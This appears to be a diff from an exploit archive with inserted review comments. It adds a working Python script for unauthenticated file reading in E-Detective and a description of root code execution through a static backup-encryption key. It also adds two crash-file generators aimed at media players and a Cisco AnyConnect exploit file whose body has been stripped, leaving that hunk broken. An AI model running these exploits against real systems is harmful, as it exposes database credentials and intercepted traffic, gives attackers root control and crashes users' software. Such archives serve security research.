+# Authors: Mustafa Al-Bassam (https://musalbas.com) +# slipstream/RoL (https://twitter.com/TheWack0lian) + +import argparse +import base64 +import urllib2 + + +def display_banner(): + print """ + _ + | | + _ ____ ___ __ ___ __| |______ +| '_ \ \ /\ / / '_ \ / _ \/ _` |______| +| |_) \ V V /| | | | __/ (_| | +| .__/ \_/\_/ |_| |_|\___|\__,_| +| | +|_| + _ _ _ _ + | | | | | | (_) + __| | ___| |_ ___ ___| |_ ___ _____ + / _` |/ _ \ __/ _ \/ __| __| \ \ / / _ \\ +| (_| | __/ || __/ (__| |_| |\ V / __/ + \__,_|\___|\__\___|\___|\__|_| \_/ \___| +""" + +argparser = argparse.ArgumentParser(description='Proof-of-concept for unauthenticated LFD in E-Detective.') +argparser.add_argument('hostname', help='hostname to pwn') +argparser.add_argument('file', help='path to file on server to grab') + + +def encode(text): + encoded = '' + + for i in range(len(text)): + encoded += chr(ord(text[i]) + 40) + + encoded = base64.b64encode(encoded) + return encoded + + +def poc(hostname, file): + return http_read('https://' + hostname + '/common/download.php?file=' + encode(file)) + + +def http_read(url): + return urllib2.urlopen(url).read() + +if __name__ == "__main__": + display_banner() + args = argparser.parse_args() + print poc(args.hostname, args.file) + + +----- + + + +The /common/download.php in the web root allows for an unauthenticated +user to read any file on the system that the web user has access to. +This includes database credentials and any traffic intercepts captured +by the system. + +The "file" parametre is "protected" by inadequate "cipher": base64 +followed by rot40, which is trivially reversible. + +2) Authenticated Remote Code Execution + +The restore feature in the "config backup" page extracts a .tar file +encrypted with OpenSSL blowfish into the root directory (/) as root. + +The .tar file should be encrypted with the static key "/tmp/.charlie". +Yes, that's the actual key - they pass the wrong argument to OpenSSL. 
+They used -k instead of -kfile, thus the key is the path of the key file +rather than the contents of the key file. + +This enables an attacker to upload a shell into the web root, or +overwrite any system files such as /etc/shadow. \ No newline at end of file diff --git a/platforms/windows/dos/37287.html b/platforms/windows/dos/37287.html new file mode 100755 index 000000000..48e863eae --- /dev/null +++ b/platforms/windows/dos/37287.html @@ -0,0 +1,244 @@ + + + + + + +Cisco AnyConnect Secure Mobility Client VPN API Stack Overflow + + + + + + + \ No newline at end of file diff --git a/platforms/windows/dos/37299.py b/platforms/windows/dos/37299.py new file mode 100755 index 000000000..0578ef0fe --- /dev/null +++ b/platforms/windows/dos/37299.py 
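Review bot: The hunk header for platforms/windows/dos/37287.html claims 244 added lines, but only the title `Cisco AnyConnect Secure Mobility Client VPN API Stack Overflow` and fourteen empty `+` lines survive, so the markup body has been stripped in the export and the line count no longer matches the content; a patch tool will reject the hunk and the committed file would not be the PoC the index row describes. Restore the file from the source or regenerate the hunk before indexing it.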
@@ -0,0 +1,43 @@
+#!/usr/bin/python
+
+#[+] Author: SATHISH ARTHAR
+#[+] Exploit Title: XtMediaPlayer - 0.93 Memory Corruption PoC
+#[+] Date: 16-06-2015
+#[+] Category: DoS/PoC
+#[+] Tested on: WinXp/Windows 7
+#[+] Vendor: http://downloads.sourceforge.net/project/xtmediaplayer/XtMediaPlayer/XtMediaPlayer_0.93_Win.rar
+#[+] Sites: sathisharthars.wordpress.com
+#[+] Twitter: @sathisharthars
+#[+] Thanks: offensive security (@offsectraining)
+
+
+
+import os
+os.system("color 02")
+
+print"###########################################################"
+print"# Title: XtMediaPlayer - 0.93 Memory Corruption PoC #"
+print"# Author: SATHISH ARTHAR #"
+print"# Category: DoS/PoC # "
+print"###########################################################"
+
+crash=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
+"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
+"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+
+filename = "crash.wav"
+file = open(filename , "w")
+file.write(crash)
+print "\n Files Created!\n"
+file.close()
diff --git a/platforms/windows/dos/37300.py b/platforms/windows/dos/37300.py
new file mode 100755
index 000000000..2d2344cf1
--- /dev/null
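Review bot: `file = open(filename , "w")` writes a binary payload through a text-mode handle and shadows the `file` builtin; on Windows, the stated test platform, text mode rewrites `\n` as `\r\n`, which only goes unnoticed here because the blob contains no `\x0A` byte, and the handle is not closed if `write` raises. The idiomatic form is `with open(filename, "wb") as fh:` followed by `fh.write(crash)`, which also drops the separate `file.close()`. The same applies to 37300.py in the next hunk. Note also that the two files write byte-for-byte the same blob (its first four bytes `\x2E\x73\x6E\x64` spell `.snd`, which looks like a Sun audio header) under a `.wav` and an `.mp4` name respectively, so the index should probably describe them as one payload tested against two players rather than two distinct findings.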
+++ b/platforms/windows/dos/37300.py
@@ -0,0 +1,44 @@
+#!/usr/bin/python
+
+#[+] Author: SATHISH ARTHAR
+#[+] Exploit Title: FinePlayer - 2.20 Memory Corruption PoC
+#[+] Date: 16-06-2015
+#[+] Category: DoS/PoC
+#[+] Tested on: WinXp/Windows 7
+#[+] Vendor: http://www.gitashare.com
+#[+] Download: http://www.gitashare.com/downloads/fineplayer220.zip
+#[+] Sites: sathisharthars.wordpress.com
+#[+] Twitter: @sathisharthars
+#[+] Thanks: offensive security (@offsectraining)
+
+
+
+import os
+os.system("color 02")
+
+print"###########################################################"
+print"# Title: FinePlayer - 2.20 Memory Corruption PoC #"
+print"# Author: SATHISH ARTHAR #"
+print"# Category: DoS/PoC # "
+print"###########################################################"
+
+crash=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
+"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
+"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+
+filename = "crash.mp4"
+file = open(filename , "w")
+file.write(crash)
+print "\n Files Created!\n"
+file.close()